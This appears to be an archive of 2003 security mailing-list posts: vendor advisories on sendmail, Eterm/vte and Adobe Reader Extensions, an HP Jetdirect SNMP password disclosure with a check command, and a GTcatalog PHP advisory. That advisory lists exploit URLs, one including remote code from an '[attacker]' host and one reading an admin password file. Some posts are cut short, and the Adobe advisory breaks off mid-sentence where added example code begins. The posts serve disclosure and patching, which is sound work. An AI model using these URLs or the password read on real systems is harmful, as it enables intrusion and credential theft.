GLSA: eterm (200303-1)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - --------------------------------------------------------------------
GENTOO LINUX SECURITY ANNOUNCEMENT 200303-1
- - --------------------------------------------------------------------

PACKAGE           : eterm
SUMMARY           : dangerous interception of escape sequences
DATE              : 2003-03-03 10:13 UTC
EXPLOIT           : remote
VERSIONS AFFECTED : 0.9.2
FIXED VERSION     : 0.9.2
CVE               : CAN-2003-0021 CAN-2003-0068

- - --------------------------------------------------------------------

From advisory:

  Many of the features supported by popular terminal emulator software
  can be abused when un-trusted data is displayed on the screen. The
  impact of this abuse can range from annoying screen garbage to a
  complete system compromise. All of the issues below are actually
  documented features; anyone who takes the time to read over the man
  pages or source code could use them to carry out an attack.

Read the full advisory at:
http://marc.theaimsgroup.com/?l=bugtraq&m=104612710031920&w=2

SOLUTION

It is recommended that all Gentoo Linux users who are running
x11-terms/eterm upgrade to eterm-0.9.2-r3 as follows:

  emerge sync
  emerge -u eterm
  emerge clean

- - --------------------------------------------------------------------
[EMAIL PROTECTED] - GnuPG key is available at http://cvs.gentoo.org/~aliz
- - --------------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQE+YyrSfT7nyhUpoZMRAmQMAJ9l+LP0d7ZiiU/ORWsHe8dfbizcygCfRRaY
0qutlqN466gl7gkPydYcc6c=
=W8wR
-----END PGP SIGNATURE-----
GLSA: vte (200303-2)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - --------------------------------------------------------------------
GENTOO LINUX SECURITY ANNOUNCEMENT 200303-2
- - --------------------------------------------------------------------

PACKAGE           : vte
SUMMARY           : dangerous interception of escape sequences
DATE              : 2003-03-03 10:16 UTC
EXPLOIT           : remote
VERSIONS AFFECTED : 0.10.25
FIXED VERSION     : 0.10.25
CVE               : CAN-2003-0070

- - --------------------------------------------------------------------

From advisory:

  Many of the features supported by popular terminal emulator software
  can be abused when un-trusted data is displayed on the screen. The
  impact of this abuse can range from annoying screen garbage to a
  complete system compromise. All of the issues below are actually
  documented features; anyone who takes the time to read over the man
  pages or source code could use them to carry out an attack.

Read the full advisory at:
http://marc.theaimsgroup.com/?l=bugtraq&m=104612710031920&w=2

SOLUTION

It is recommended that all Gentoo Linux users who are running
x11-libs/vte upgrade to vte-0.10.25 as follows:

  emerge sync
  emerge -u vte
  emerge clean

- - --------------------------------------------------------------------
[EMAIL PROTECTED] - GnuPG key is available at http://cvs.gentoo.org/~aliz
- - --------------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQE+YytrfT7nyhUpoZMRAmM4AJ9GiRX6v2zDkr0hftZ5hWc0rP8FtwCfWjsM
sM4EOkJZrokHlfOWLABLBgo=
=+/3p
-----END PGP SIGNATURE-----
Re: Netscape Communicator 4.x sensitive information in configuration file
Although keeping the password plaintext in a configuration file isn't the
best way to handle a password that software needs to remember, I do however
want to point out that in order for programs to remember your password, they
*must* store the password in some sort of reversible obfuscation, meaning
that once the obfuscation algorithm is known, the password is no more secure
no matter how obfuscated it gets, as the software must at some point in time
return it to a plaintext form in order to make use of it. Obfuscating stored
passwords only provides a minimal level of additional protection.

If you are using a system where someone has access to your configuration
files (example: public computer lab in a library or college campus), then do
*not* store your password on that machine. If someone has the same access to
that machine as you do, consider any information you store on it to be
publicly available, and take appropriate precautions for sensitive
information.

-MightyE

Neil Dickey wrote:

> Marc Ruef [EMAIL PROTECTED] wrote:
>
>> The following paste shows the IMAP mail part of this configuration
>> file. You can see that line 17 shows the unencrypted password
>> (MyPassword4).
>>
>> [ ... Snip ... ]
>>
>> user_pref("mail.imap.server.imap.computec.ch.password", "MyPassword4");
>> user_pref("mail.imap.server.imap.computec.ch.remember_password", true);
>
> I notice from the line immediately following that you have the package
> remember your password. It's been my understanding that doing so is bad
> practice because that's just the sort of thing that someone probing
> your system would very likely be looking for. Certainly if you save
> your password only in your head, then whether or not the program stores
> it in the clear is a moot question. ;-)
>
> Best regards,
>
> Neil Dickey, Ph.D.
> Research Associate/Sysop
> Geology Department
> Northern Illinois University
> DeKalb, Illinois 60115

smime.p7s
Description: S/MIME Cryptographic Signature
Implementation flaws in Adobe Document Server for Reader Extensions
Summary
=======

Free Adobe Acrobat Reader (version 5.1 or later) has the ability to: add
notes and attachments, add and check digital signatures, save forms locally,
fill them out online, distribute them to others for review and commenting,
and submit forms via e-mail or the Web directly from within Acrobat Reader.
But the actions listed above are available for rights-enabled documents only
(i.e. documents processed by Adobe Document Server for Reader Extensions).
Improper usage of cryptography in the server software allows anyone to
produce reader-enabled documents without Document Server for Reader
Extensions.

Contact information
===================

Name   : ElcomSoft Co.Ltd.
E-mail : [EMAIL PROTECTED]
Fax    : +1 866 448-2703 (US/Canada, toll-free)

The problem has been reported to the vendor (Adobe Systems Inc) on
02/24/2003; the vendor has not replied.

Technical info
==============

Adobe Document Server for Reader Extensions
-------------------------------------------

With this server, customers can assign custom usage rights to specific Adobe
Portable Document Format (PDF) forms and documents, so Acrobat Reader 5.1
users can get access to additional features while working with the document.
The server can enable four types of usage rights on a PDF form:

- Commenting tools, including sticky notes, highlights, stamps, and
  strikethroughs;
- The ability to save a form to a desktop for offline completion or
  archiving, without losing any forms data;
- Digital signatures, including support for Public Key Infrastructure
  systems for third-party validation (VeriSign, Entrust, and others);
- Advanced form features, including the ability to submit a form offline or
  via email, import or export forms data and attached files.

A description of the Adobe Document Server for Reader Extensions features is
available at http://www.adobe.com/products/server/readerextensions/main.html.

The implementation of Document Server for Reader Extensions does not seem to
be very complicated. The server just gets the PDF file (to be
reader-enabled) together with the list of enabling options, and produces a
new document that contains one additional dictionary - actually, simply by
adding an additional block of data.

Note: for details of the PDF structure, see the Portable Document Format
Specification:
http://partners.adobe.com/asn/developer/acrosdk/docs/filefmtspecs/PDFReference.pdf

The new dictionary is named ViewerPreferences and resides within the
document's Root dictionary. For now, only one element is placed inside the
ViewerPreferences dictionary - the Rights dictionary. The content of the
Rights dictionary can be described as follows (key name, type and
description):

Version (number)
  A number specifying the version of the Rights dictionary. Currently only
  version 1 is supported.

Document (array of names)
  List of flags related to Document operations. Currently only one flag is
  supported: FullSave.

Form (array of names)
  List of flags related to Form processing. Supported flags: Import, Export,
  SubmitStandalone, SpawnTemplate.

Annots (array of names)
  List of flags related to Annotations. Supported flags: Create, Delete,
  Modify, Copy, Import, Export.

Signature (array of names)
  List of flags related to Digital Signature handling. Currently only one
  flag is supported: Modify.

Msg (text string)
  Arbitrary string to be displayed in the Instructions box when a
  reader-enabled document is opened in Acrobat Reader 5.1.

TimeOfUbiquitization (date)
  The date and time when the document was processed by Document Server for
  Reader Extensions.

RightsID or ADBE_RightsID (array)
  List of RSA-based digital signatures for checking the integrity of the
  reader-enabling attributes.

Most elements listed in the table above are self-descriptive. The name of
the last key could be either RightsID or ADBE_RightsID - they are equivalent
in Reader 5.1.

Values in the RightsID (or ADBE_RightsID) array are 512-bit RSA-encrypted
values, and could be decrypted with an RSA public key which is hard-coded (in
encrypted form) within the Reader 5.1 executable. Those values are used as
digital signatures of some critical document parts to make sure that the
document was reader-enabled with Adobe Document Server for Reader Extensions.

A sample form with additional usage rights can be downloaded from
http://www.adobe.com/products/server/readerextensions/pdfs/sample_docserver_readerext.pdf

According to the press release from October 21, 2002, available at
http://www.adobe.com/aboutadobe/pressroom/pressreleases/pdfs/200210/20021021Ubiquity.pdf,
pricing of Adobe Document Server for Reader Extensions starts at US$75,000.

Adobe Acrobat Reader
--------------------

Adobe Acrobat Reader is the most popular part of the Adobe Acrobat product
family. Acrobat Reader is
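The Rights dictionary described above is ordinary PDF dictionary syntax, so the usage rights a document claims can be read out with a small parser. The following is an added example, not ElcomSoft's tool or Adobe's code: it tokenizes a subset of PDF object syntax (dictionaries, arrays, names, numbers, literal and hex strings) and summarizes the Rights entries found under ViewerPreferences. The catalog fragment is constructed, the RightsID entries are placeholder bytes, and the example only reports what the document asserts; it does not verify the RSA signatures, which is the check a reader has to perform before honoring those rights.

```python
import re

# One token class per alternative; order matters ('<<' before a hex string '<..>').
TOKEN = re.compile(
    r"(?P<ws>\s+)"
    r"|(?P<dict_open><<)|(?P<dict_close>>>)"
    r"|(?P<arr_open>\[)|(?P<arr_close>\])"
    r"|(?P<name>/[^\s/\[\]<>()]*)"
    r"|(?P<num>[+-]?\d+(?:\.\d+)?)"
    r"|(?P<hex><[0-9A-Fa-f\s]*>)"
    r"|(?P<str>\()"
)


def tokenize(src):
    """Yield (kind, text) pairs for a subset of PDF object syntax."""
    pos = 0
    while pos < len(src):
        m = TOKEN.match(src, pos)
        if not m:
            raise ValueError(f"unexpected input at {pos}: {src[pos:pos + 12]!r}")
        kind, pos = m.lastgroup, m.end()
        if kind == "str":          # literal string: balanced parens, backslash escapes
            depth, out = 1, []
            while depth:
                if pos >= len(src):
                    raise ValueError("unterminated literal string")
                c = src[pos]
                pos += 1
                if c == "\\" and pos < len(src):   # escaped character taken literally
                    out.append(src[pos])
                    pos += 1
                    continue
                depth += (c == "(") - (c == ")")
                if depth:
                    out.append(c)
            yield ("str", "".join(out))
        elif kind != "ws":
            yield (kind, m.group())


def parse(src):
    """Parse one PDF object into dict / list / str / int / float / bytes."""
    toks, i = list(tokenize(src)), 0

    def value():
        nonlocal i
        kind, text = toks[i]
        i += 1
        if kind == "dict_open":
            d = {}
            while toks[i][0] != "dict_close":
                k, name = toks[i]
                i += 1
                if k != "name":
                    raise ValueError("dictionary keys must be names")
                d[name[1:]] = value()
            i += 1
            return d
        if kind == "arr_open":
            items = []
            while toks[i][0] != "arr_close":
                items.append(value())
            i += 1
            return items
        if kind == "name":
            return text[1:]
        if kind == "num":
            return float(text) if "." in text else int(text)
        if kind == "hex":
            return bytes.fromhex(re.sub(r"\s", "", text[1:-1]))
        return text                 # literal string
    return value()


RIGHTS_ARRAYS = ("Document", "Form", "Annots", "Signature")


def rights_summary(catalog):
    """Summarize the Rights dictionary under ViewerPreferences, or None if absent."""
    rights = catalog.get("ViewerPreferences", {}).get("Rights")
    if rights is None:
        return None
    summary = {key: list(rights.get(key, [])) for key in RIGHTS_ARRAYS}
    summary["version"] = rights.get("Version")
    # Either key name is accepted by Reader 5.1; these signatures are what a
    # verifier must check before honoring any of the rights above.
    signatures = rights.get("RightsID", rights.get("ADBE_RightsID", []))
    summary["signature_count"] = len(signatures)
    return summary


# Constructed catalog fragment; the hex strings are placeholder bytes, not signatures.
SAMPLE_CATALOG = """<< /Type /Catalog
  /ViewerPreferences << /Rights <<
      /Version 1
      /Document [ /FullSave ]
      /Form [ /Import /Export /SubmitStandalone /SpawnTemplate ]
      /Annots [ /Create /Delete /Modify /Copy /Import /Export ]
      /Signature [ /Modify ]
      /Msg (Constructed sample: this form may be saved and submitted offline.)
      /TimeOfUbiquitization (D:20030303101300Z)
      /ADBE_RightsID [ <00112233> <44556677> ]
  >> >>
>>"""

if __name__ == "__main__":
    print(rights_summary(parse(SAMPLE_CATALOG)))
```

The summary deliberately separates the rights the document claims from the count of signatures it carries: a reader that enables FullSave or Form submission on the strength of the claimed arrays alone, without checking those signatures against the public key, would honor any rights a third party chose to write in.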
New HP Jetdirect SNMP password vulnerability when using Web JetAdmin
Hello,

During an analysis of some HP Jetdirect cards I discovered a security issue
that could lead to full access to a networked printer. It looks like the
vulnerability described in http://www.securityfocus.com/bid/5331, but the
OID is different and you can only obtain one specific password. It is also
different from the password vulnerability described in
http://www.securityfocus.com/bid/3132

It applies to the following situation:

- Any operating system
- HP Jetdirect cards JetDirect 300X (J3263A), JetDirect EX Plus (J2591A),
  JetDirect 400N (J2552A, J2552B), JetDirect 600N (J3110A, J3111A, J3113A)
  and older.
- The Jetdirect card is being managed from HP Web Jetadmin.
- A Web Jetadmin device password had been set on the JetDirect card. (This
  password must be set from Web Jetadmin and has nothing to do with the
  Telnet password or the SNMP Set community name.)

In the above situation the Web Jetadmin device password is readable as plain
ASCII text from the JetDirect card using SNMP.

How to check your printers for this vulnerability:

Use an SNMP toolkit to read the following OID from your printer:

  .iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-printer.generalDeviceStatus.gdPasswords

(In numerical format: .1.3.6.1.4.1.11.2.3.9.1.1.13.0)

An example on a Windows machine, using SNMPUTIL from the Windows Resource
Kit:

  C:\> snmputil get 131.155.120.118 public .1.3.6.1.4.1.11.2.3.9.1.1.13.0
  Variable = .iso.org.dod.internet.private.enterprises.11.2.3.9.1.1.13.0
  Value    = String 0x41 0x42 0x43 0x44 0x55 0x56 0x3d 0x31 0x30 0x38 0x3b 0x00 0x00 0x00 0x00 ..etc...

The resulting string reads in ASCII: ABCDEF=108;

The Web Jetadmin device password is the word before the '=' sign, in this
case: ABCDEF

How to protect your printer:

1. Keep the Web Jetadmin device password EMPTY (don't do this on newer cards
   than the ones mentioned above)
2. Define a 'Set community name' instead

Additional means of protection (does not address the SNMP vulnerability):

3. Define a telnet password (do not keep it empty)
4. Create an 'allow list' from the Telnet console to restrict access from
   defined IP-addresses

Sven Pechler
University of Technology Eindhoven
Faculty of Technology Management
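When auditing a fleet of printers with the check described above, the snmputil output has to be turned back into text and the field before '=' inspected on every card. The following is an added example, not part of the advisory or of any HP tool: it decodes snmputil's hex rendering of a String value, extracts the word before '=' as the advisory describes, and reports whether a non-empty Web Jetadmin device password is readable. Both sample outputs are constructed (the bytes differ from the advisory's capture), and the shape of the empty-password case is an assumption, since the advisory shows only the populated one.

```python
import re

# Matches the byte-by-byte hex rendering snmputil uses for a String value.
HEX_TOKEN = re.compile(r"0x([0-9A-Fa-f]{2})")

# Constructed sample of snmputil output for the gdPasswords OID (not the
# advisory's own capture; same shape, different bytes).
SAMPLE_EXPOSED = """Variable = .iso.org.dod.internet.private.enterprises.11.2.3.9.1.1.13.0
Value    = String 0x41 0x42 0x43 0x44 0x45 0x46 0x3d 0x31 0x30 0x38 0x3b 0x00 0x00 0x00"""

# Constructed sample for a card whose device password is empty. Assumption:
# the field then renders as an empty word before '='.
SAMPLE_EMPTY = "Value    = String 0x3d 0x31 0x30 0x38 0x3b 0x00 0x00"


def decode_snmputil_string(output: str) -> str:
    """Rebuild the text of a 'String 0x.. 0x..' value; NUL padding is dropped."""
    raw = bytes(int(h, 16) for h in HEX_TOKEN.findall(output))
    return raw.split(b"\x00", 1)[0].decode("ascii", errors="replace")


def webjetadmin_password(decoded: str):
    """The device password is the word before '=' (as the advisory describes).
    Returns None when the value has no '=' at all, '' when the word is empty."""
    if "=" not in decoded:
        return None
    return decoded.split("=", 1)[0]


def assess(output: str) -> dict:
    """Classify one snmputil result: is a Web Jetadmin device password exposed?"""
    decoded = decode_snmputil_string(output)
    password = webjetadmin_password(decoded)
    return {
        "decoded": decoded,
        "password": password,
        "exposed": bool(password),   # non-empty word before '=' means it is readable
    }


if __name__ == "__main__":
    for label, sample in (("exposed", SAMPLE_EXPOSED), ("empty", SAMPLE_EMPTY)):
        result = assess(sample)
        print(f"{label}: decoded={result['decoded']!r} exposed={result['exposed']}")
```

A card that reports "exposed" is one where the first two protections above apply: clear the Web Jetadmin device password and rely on an SNMP Set community name instead.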
Contact for Palm Computing
Does anyone know who is the security contact for Palm Computing (PalmOS)? -- Joel Maslak
GTcatalog (PHP)
Information:
------------

Version : 0.9
Website : http://www.geektweaked.com
Problem :
- Information Disclosure (Admin Password)
- File Including

PHP Code/Location:
------------------

password.inc:

  <?
  $globalpw = "[PASSWORD]";
  ?>

index.php:

  [...]
  switch ($function) {
    case "custom":
      $cc = new Template();
      $cc->set_file("head", $dir_base.$dir_template."header.inc");
      $cc->set_var(array(
          'clientcode' => $cfg_clientcode,
          'title'      => $cfg_title." - ".$custom));
      $cc->parse("output", "head");
      $cc->p("output");
      include($custom.".custom.inc");      // $custom is taken straight from the request
      include($dir_base.$dir_template."footer.inc");
      break;
  [...]

Exploits:
---------

- http://[target]/password.inc
- http://[target]/index.php?function=custom&custom=http://[attacker]/1
  with: http://[attacker]/1.custom.inc

Patch:
------

A patch can be found on http://www.phpsecure.info (- New Version !! :))

More Details:
-------------

In French: http://www.frog-man.org/tutos/GTcatalog.txt

[EMAIL PROTECTED]
Mail Header Buffer Overflow In Sendmail
-----BEGIN PGP SIGNED MESSAGE-----

______________________________________________________________________________

                          SGI Security Advisory

        Title:     Mail Header Buffer Overflow In Sendmail
        Number:    20030301-01-P
        Date:      March 3, 2003
        Reference: CERT VU#398025
        Reference: CERT CA-2003-07
        Reference: CVE CAN-2002-1337
        Reference: SGI BUG 869098 875386 880975
        Fixed in:  IRIX 6.5.20 or patches 4975 and 4976
______________________________________________________________________________

- -----------------------
- --- Issue Specifics ---
- -----------------------

ISS and sendmail.org have reported that there is a vulnerability involving
mail header manipulation that can result in a remote user gaining root
access to a system receiving mail through sendmail.

http://www.sendmail.org/8.12.8.html
http://www.cert.org/advisories/CA-2003-07.html
http://www.kb.cert.org/vuls/id/398025
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1337

SGI has investigated the issue and recommends the following steps for
neutralizing the exposure. It is HIGHLY RECOMMENDED that these measures be
implemented on ALL vulnerable SGI systems. These issues have been corrected
with patches and in future releases of IRIX.

- --------------
- --- Impact ---
- --------------

The sendmail binary is installed by default on IRIX 6.5 systems as part of
eoe.sw.base.

To determine the version of IRIX you are running, execute the following
command:

  # /bin/uname -R

That will return a result similar to the following:

  # 6.5 6.5.19f

The first number (6.5) is the release name, the second (6.5.16f in this
case) is the extended release name. The extended release name is the
version we refer to throughout this document.

- -----------------------------
- --- Temporary Workaround ---
- -----------------------------

At this time, there is no effective workaround (other than disabling
sendmail) for these problems. SGI recommends either upgrading to IRIX
6.5.20, or installing the appropriate patch from the listing below.

- ----------------
- --- Solution ---
- ----------------

SGI has provided a series of patches for these vulnerabilities. Our
recommendation is to upgrade to IRIX 6.5.20 when available, or install the
appropriate patch.

   OS Version     Vulnerable?     Patch #      Other Actions
   ----------     -----------     -------      -------------
   IRIX 3.x        unknown                     Note 1
   IRIX 4.x        unknown                     Note 1
   IRIX 5.x        unknown                     Note 1
   IRIX 6.0.x      unknown                     Note 1
   IRIX 6.1        unknown                     Note 1
   IRIX 6.2        unknown                     Note 1
   IRIX 6.3        unknown                     Note 1
   IRIX 6.4        unknown                     Note 1
   IRIX 6.5        yes                         Notes 2 & 3
   IRIX 6.5.1      yes                         Notes 2 & 3
   IRIX 6.5.2      yes                         Notes 2 & 3
   IRIX 6.5.3      yes                         Notes 2 & 3
   IRIX 6.5.4      yes                         Notes 2 & 3
   IRIX 6.5.5      yes                         Notes 2 & 3
   IRIX 6.5.6      yes                         Notes 2 & 3
   IRIX 6.5.7      yes                         Notes 2 & 3
   IRIX 6.5.8      yes                         Notes 2 & 3
   IRIX 6.5.9      yes                         Notes 2 & 3
   IRIX 6.5.10     yes                         Notes 2 & 3
   IRIX 6.5.11     yes                         Notes 2 & 3
   IRIX 6.5.12     yes                         Notes 2 & 3
   IRIX 6.5.13     yes                         Notes 2 & 3
   IRIX 6.5.14     yes                         Notes 2 & 3
   IRIX 6.5.15     yes             4975        Notes 2, 4 & 5
   IRIX 6.5.16     yes             4975        Notes 2, 4 & 5
   IRIX 6.5.17     yes             4975        Notes 2, 4 & 5
   IRIX 6.5.18     yes             4975        Notes 2, 4 & 5
   IRIX 6.5.19     yes             4976        Notes 2, 4 & 6
   IRIX 6.5.20     no

   NOTES

     1) This version of the IRIX operating system has been retired.
        Upgrade to an actively supported IRIX operating system. See
        http://support.sgi.com/irix/news/index.html#policy for more
        information.

     2) If you have not received an IRIX 6.5.X CD for IRIX 6.5, contact
        your SGI Support Provider or URL:
        http://support.sgi.com/irix/swupdates/

     3) Upgrade to IRIX 6.5.20

     4) Install the patch

     5) This patch also fixes the smrsh issue discussed in SGI Security
        Bulletin 20030101-01-P.

     6) This patch also fixes the relaying issue discussed in SGI Security
        Bulletin 20030101-01-P.

- -----------------------
- --- Acknowledgments ---
- -----------------------

SGI wishes to thank sendmail.org, ISS, CERT, and the users of the Internet
Community at large for their assistance in this matter.

# Patch File Checksums

The actual patch will be a tar file containing
Re: Terminal Emulator Security Issues
> Would stripping escape sequences from the window title work? Do you
> know of any applications that actually use this feature?

...snip...

> (Incidentally, I was unable to embed any such sequences in the
> title/icon name in 0.9.2 anyway...but I didn't try for very long, so I
> may have missed something.)

After further investigation, I'd like to point out the following:

Eterm has *never* allowed any control characters in its title/icon name
sequences. The following bit of code has existed at least since Eterm was
first committed to CVS:

    else if (ch < ' ')
        return;                 /* control character - exit */

in term.c::process_xterm_seq(), line 1270 or so.

So there was never any way to get escape sequences in the title to begin
with, meaning that the command cannot be hidden using any character
attributes or background/foreground color matching. Furthermore, the title
which is printed via the \e[21t sequence is limited to just under 1024
characters, which is not enough to cause the command to scroll off the
screen on any but the smallest of terminals. Thus, the following footnote
from the original report applies to Eterm as well:

> [1] Although putty would place the title onto the command-line, we were
> not able to find a method of hiding the command, since neither the
> invisible character attribute nor the foreground color could be set.
> Putty has a relatively low limit to the number of characters that can be
> placed into the window title, so it is not possible to simply flood the
> screen with garbage and hope the command rolls past the current view.

Having said all that, it would seem that Eterm 0.9.2 is not vulnerable to
ANY of the issues mentioned in this report. As such, all distributions
shipping older versions of Eterm should be safe after upgrading to 0.9.2.
To that end, Eterm source and RPM packages are available for download at
http://www.eterm.org/download/ for any vendor/user with 0.9.1 or earlier.

Hope that clears everything up. :-)

Regards,
Michael

-- 
Michael Jennings (a.k.a. KainX)    http://www.kainx.org/    [EMAIL PROTECTED]
n + 1, Inc., http://www.nplus1.net/          Author, Eterm (www.eterm.org)
---
 "By the time they had diminished from 50 to 8, the other dwarves began
  to suspect 'Hungry'..."                    -- Gary Larson, The Far Side
Re: sendmail 8.12.8 available
Claus Assmann [EMAIL PROTECTED] writes:

> Sendmail, Inc., and the Sendmail Consortium announce the availability
> of sendmail 8.12.8. It contains a fix for a critical security problem
> discovered by Mark Dowd of ISS X-Force; we thank ISS X-Force for
> bringing this problem to our attention. Sendmail urges all users to
> either upgrade to sendmail 8.12.8 or apply the patch for 8.12 that is
> part of this announcement.

Would people be willing to share filter rules for other MTAs to block
offending messages on relays?

Thanks,

-- 
Florian Weimer                          [EMAIL PROTECTED]
University of Stuttgart            http://CERT.Uni-Stuttgart.DE/people/fw/
RUS-CERT                                fax +49-711-685-5898
Sendmail buffer overflow vulnerability in AIX.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

IBM SECURITY ADVISORY

First Issued: Fri Feb 21 11:00:00 CST 2003
===============================================================================
                           VULNERABILITY SUMMARY

VULNERABILITY:  sendmail buffer overflow vulnerability.

PLATFORMS:      AIX 4.3, 5.1 and 5.2

SOLUTION:       Apply the workaround, efix or APARs as described below.

THREAT:         A remote attacker can exploit a buffer overflow to gain root
                privileges.

CERT VU Number: 398025
CVE Number:     n/a
===============================================================================
                           DETAILED INFORMATION

I.  Description
===============

Sendmail is a MTA (mail transfer agent) that routes mail for local or
network delivery. When sendmail receives a message it translates the format
of message headers to match the requirements of the destination system. The
program determines the destination via the syntax and content of the
address field in a message header.

A vulnerability that exploits how message headers are parsed has been found.
This vulnerability allows a remote attacker to gain root privileges. At this
time, there is no known exploit in the wild for this vulnerability.

The sendmail daemon runs on all versions of AIX by default. To determine if
sendmail is running on your system execute the following:

  # lssrc -s sendmail

If sendmail is running, the following will be displayed:

  Subsystem         Group            PID     Status
   sendmail         mail             <pid>   active

Where <pid> is the pid of the sendmail process on your system. If sendmail
is not installed, the system is not vulnerable.

II. Impact
==========

A remote attacker can gain root privileges.

III. Solutions
==============

A. Official Fix

IBM provides the following fixes:

  APAR number for AIX 4.3.3: IY40500 (available approx. 03/12/2003)
  APAR number for AIX 5.1.0: IY40501 (available approx. 04/28/2003)
  APAR number for AIX 5.2.0: IY40502 (available approx. 04/28/2003)

NOTE: Fixes will not be provided for versions prior to 4.3 as these are no
longer supported by IBM. Affected customers are urged to upgrade to 4.3.3 or
5.1.0 at the latest maintenance level.

B. E-fix

Temporary fixes for AIX 4.3.3, 5.1.0, and 5.2.0 systems are available. The
temporary fixes can be downloaded via ftp from:

  ftp://aix.software.ibm.com/aix/efixes/security/sendmail_efix.tar.Z

The efix compressed tarball contains three fixes: one each for AIX 4.3.3,
AIX 5.1.0 and AIX 5.2.0. It also includes this Advisory and a README file
with installation instructions.

Verify you have retrieved this efix intact:
- - - - - - - - - - - - - - - - - - - - - - -

There are 3 fix-files in this package for the 4.3.3, 5.1.0, 5.2.0 releases.
The checksums below were generated using the sum and md5 commands and are
as follows:

  Filename      sum          md5
  ============================================================
  sendmail.433  61331 428    013f747e5a447e2dec777e2e840914a9
  sendmail.510  34257 1059   5f282fd2a472c2d75c88c3c652312842
  sendmail.520  45494 1007   88bcb028aab4625abe0257d3537a0813

These sums should match exactly; if they do not, double check the command
results and the download site address. If those are OK, contact IBM AIX
Security at [EMAIL PROTECTED] and describe the discrepancy.

IMPORTANT: Create a mksysb backup of the system and verify it is both
bootable, and readable before proceeding.

These temporary fixes have not been fully regression tested; thus, IBM does
not warrant the fully correct functioning of the efix. Customers install the
efix and operate the modified version of AIX at their own risk.

Efix Installation Instructions:
- - - - - - - - - - - - - - - -

Detailed installation instructions can be found in the README file supplied
in the efix package. These instructions are summarized below.

You need to have the following filesets installed. This ensures that the
proper versions of co-requisite system files, such as libc.a, are installed:

  For AIX 4.3.3: bos.net.tcp.client.4.3.3.87
  For AIX 5.1.0: bos.net.tcp.client.5.1.0.38
  For AIX 5.2.0: bos.net.tcp.client.5.2.0.1

You can determine which fileset is installed by executing the following:

  # lslpp -L bos.net.tcp.client

1. Create a temporary efix directory and move to that directory.

  # mkdir /tmp/efix
  # cd /tmp/efix

2. Move the efix to /tmp/efix, uncompress it and un-tar the resulting
   tarfile. Move to the fix directory.

  # cp PATH_TO_ADVISORY /tmp/efix     # where PATH_TO_ADVISORY is the fully
                                      # qualified path to the efix package.
  # uncompress sendmail_efix.tar.Z
  # tar xvf sendmail_efix.tar
  # cd sendmail_efix

3. Rename the patched binary files appropriate for your system and set
   ownership and permissions.

  # mv sendmail.xxx sendmail          # where xxx is 433, 510 or 520
  #
sendmail 8.12.8 available
-----BEGIN PGP SIGNED MESSAGE-----

Sendmail, Inc., and the Sendmail Consortium announce the availability of
sendmail 8.12.8. It contains a fix for a critical security problem discovered
by Mark Dowd of ISS X-Force; we thank ISS X-Force for bringing this problem
to our attention. Sendmail urges all users to either upgrade to sendmail
8.12.8 or apply the patch for 8.12 that is part of this announcement.
Patches for older versions can be downloaded from ftp.sendmail.org, see
http://www.sendmail.org/ for details. Remember to check the PGP signatures
of patches or releases obtained. For those not running the open source
version, check with your vendor for a patch.

There is a bug fix for ident parsing in 8.12.8. While this is not believed
to be exploitable, if you are not upgrading to 8.12.8, you may want to turn
off ident checking by adding this to your .mc file:

  define(`confTO_IDENT', `0s')

For a complete list of changes see the release notes down below. Please send
bug reports to [EMAIL PROTECTED] as usual.

Note: We have changed the way we digitally sign the source code
distributions to simplify verification: in contrast to earlier versions two
.sig files are provided, one each for the gzip'ed version and the compressed
version. That is, instead of signing the tar file, we sign the
compressed/gzip'ed files, so you do not need to uncompress the file before
checking the signature.

This version can be found at

  ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.8.tar.gz
  ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.8.tar.gz.sig
  ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.8.tar.Z
  ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.8.tar.Z.sig

and the usual mirror sites.

MD5 signatures:

  71b4ce8276536b82d4acdf6ec8be306a  sendmail.8.12.8.tar.gz
  2ecf7890c2ff5035aed8d342473d85a5  sendmail.8.12.8.tar.gz.sig
  b06953b5fd11f9cd63b1eb89625ad881  sendmail.8.12.8.tar.Z
  b505fc5b36fbba5b3af2afecb4d587b3  sendmail.8.12.8.tar.Z.sig

You either need the first two files or the third and fourth, i.e., the
gzip'ed version or the compressed version and the corresponding .sig file.

The PGP signature was created using the Sendmail Signing Key/2003, available
on the web site (http://www.sendmail.org/) or on the public key servers.

Since sendmail 8.11 and later includes hooks to cryptography, the following
information from OpenSSL applies to sendmail as well.

  PLEASE REMEMBER THAT EXPORT/IMPORT AND/OR USE OF STRONG CRYPTOGRAPHY
  SOFTWARE, PROVIDING CRYPTOGRAPHY HOOKS OR EVEN JUST COMMUNICATING
  TECHNICAL DETAILS ABOUT CRYPTOGRAPHY SOFTWARE IS ILLEGAL IN SOME PARTS
  OF THE WORLD. SO, WHEN YOU IMPORT THIS PACKAGE TO YOUR COUNTRY,
  RE-DISTRIBUTE IT FROM THERE OR EVEN JUST EMAIL TECHNICAL SUGGESTIONS OR
  EVEN SOURCE PATCHES TO THE AUTHOR OR OTHER PEOPLE YOU ARE STRONGLY
  ADVISED TO PAY CLOSE ATTENTION TO ANY EXPORT/IMPORT AND/OR USE LAWS
  WHICH APPLY TO YOU. THE AUTHORS ARE NOT LIABLE FOR ANY VIOLATIONS YOU
  MAKE HERE. SO BE CAREFUL, IT IS YOUR RESPONSIBILITY.

                        SENDMAIL RELEASE NOTES

     $Id: RELEASE_NOTES,v 8.1340.2.113 2003/02/11 19:17:41 gshapiro Exp $

This listing shows the version of the sendmail binary, the version of the
sendmail configuration files, the date of release, and a summary of the
changes in that release.

8.12.8/8.12.8   2003/02/11
        SECURITY: Fix a remote buffer overflow in header parsing by
                dropping sender and recipient header comments if the
                comments are too long.  Problem noted by Mark Dowd of ISS
                X-Force.
        Fix a potential non-exploitable buffer overflow in parsing the .cf
                queue settings and potential buffer underflow in parsing
                ident responses.  Problem noted by Yichen Xie of Stanford
                University Compilation Group.
